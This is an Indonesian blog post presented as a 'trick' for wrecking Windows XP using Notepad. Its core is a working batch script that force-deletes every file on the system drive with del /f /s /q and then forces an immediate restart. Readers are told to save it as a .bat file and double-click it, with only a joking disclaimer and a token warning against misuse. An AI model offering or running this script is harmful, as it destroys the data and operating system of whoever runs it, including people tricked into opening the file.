HARAP MEMBERITAHUKAN ADMIN JIKA ADA LINK DOWNLOAD YANG MATI, KARENA ITU SANGAT PENTING. JIKA ADA YANG INGIN DI TANYAKAN ATAU REQUEST GAME DAN SOFTWARE SILAHKAN TULIS DI KOLOM CHAT SEBELAH KIRI.----------------TERIMAKASIH TELAH BERKUNJUNG KE BLOG SAYA---------------- ,

Trik Merusak System Windows XP dengan Notepad

| Kamis, 05 September 2013
"Sebelumnya saya sarankan untuk tidak menyalahgunakan Trik ini ke sembarang komputer, karena hasilnya akan fatal,jadi fikir-fikir dulu ya sob"

Trik ini cukup menarik sob, yaitu merusak system Windows Xp... caranya sangat simpel sob, gak perlu pake software apapun, cukup menggunakan Notepad.... hahaha. Penasaran sob....

Tutorial :
1). Buka notepad lalu copy-paste script dibawah ini :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2). Simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah kalian buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan saya juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini :p

PERHATIAN
"Saya tidak bertanggung jawab atas segala kerusakan yang terjadi pada komputer atau laptop sobat"
PERINGATAN
"Jangan menyalah gunakan trik ini kepada siapapun, jika sobat ingin berexperimen, gunakan komputer sobat sendiri, agar tidak merugikan orang lain"


TERIMA KASIH
source
 

0 komentar:

Posting Komentar

Catatan : Bila anda ingin berkomentar, komentarlah dengan sopan. maka saya pun akan segan

Next Prev
▲Top▲